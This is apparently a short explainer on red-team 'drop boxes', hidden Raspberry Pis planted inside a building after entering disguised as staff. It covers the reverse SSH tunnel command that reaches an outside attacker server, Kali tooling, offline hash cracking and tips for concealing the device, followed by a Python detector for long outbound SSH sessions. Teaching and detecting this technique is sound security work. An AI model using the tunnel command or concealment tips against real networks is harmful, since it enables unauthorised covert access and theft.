Red Teams often use "Drop Boxes". They physically infiltrate a building (dressed as cleaning staff), find a hidden ethernet port (behind a printer), and plug in a Raspberry Pi. They walk out, go home, and connect to the Pi remotely. From there, they scan the internal network.
Reverse SSH Tunnels
The Pi is inside the corporate firewall. It cannot accept incoming connections.
So, the Pi calls OUT to the hacker's server (AWS EC2).
ssh -R 8080:localhost:22 hacker@aws-server
Now the hacker logs into their AWS server and pivots down the tunnel into the Pi: port 8080 on the server is forwarded back to the Pi's SSH port (22).
Firewalls usually block INBOUND traffic but allow OUTBOUND traffic (so employees can browse the web). This exploits that trust.
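From the defender's side, the same outbound trust is where a drop box shows up: a long-lived SSH session leaving the network from a host that has no reason to hold one. The sketch below is an added example, not part of the original article; the flow-record columns, the internal range, the allowlist and the one-hour threshold are all assumptions to adapt to your own flow export.

```python
import csv
import io
import ipaddress

# Constructed flow records (documentation-range addresses, not real traffic).
SAMPLE_FLOWS = """src,dst,dst_port,duration_s
10.20.5.17,192.0.2.80,443,42
10.20.5.44,198.51.100.23,22,86400
10.20.9.3,10.20.1.10,22,7200
10.20.7.80,203.0.113.9,22,35
10.20.3.12,203.0.113.50,22,14400
"""

# Assumptions: the site's internal ranges, the hosts approved for outbound
# SSH (e.g. an admin jump host), and a one-hour "long-lived" threshold.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
SSH_EGRESS_ALLOWLIST = {"10.20.3.12"}
MIN_DURATION_S = 3600


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_suspect_tunnels(flow_csv):
    """Return (src, dst, duration_s) for long outbound SSH from unapproved hosts."""
    hits = []
    for row in csv.DictReader(io.StringIO(flow_csv)):
        duration = int(row["duration_s"])
        if int(row["dst_port"]) != 22:
            continue  # not SSH on its standard port
        if not is_internal(row["src"]) or is_internal(row["dst"]):
            continue  # only internal -> external sessions matter here
        if row["src"] in SSH_EGRESS_ALLOWLIST:
            continue  # approved egress host
        if duration < MIN_DURATION_S:
            continue  # short sessions are ordinary admin or git traffic
        hits.append((row["src"], row["dst"], duration))
    return hits


if __name__ == "__main__":
    for src, dst, duration in find_suspect_tunnels(SAMPLE_FLOWS):
        print(f"long-lived outbound SSH: {src} -> {dst} ({duration}s)")
```

Enforcing the same allowlist at the egress firewall, so only approved hosts may open outbound SSH at all, turns this detection into prevention.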
1. Kali Linux on ARM
Kali Linux has official builds for Raspberry Pi.
It runs surprisingly well.
You can run Nmap, Metasploit, and Wireshark.
Cracking passwords (Hashcat) is slow (no GPU), so you capture hashes on the Pi and upload them to a powerful rig for cracking.
2. Power Consumption
A Pi Zero can run off a battery bank for days.
It can be hidden inside a keyboard, a surge protector, or taped under a desk.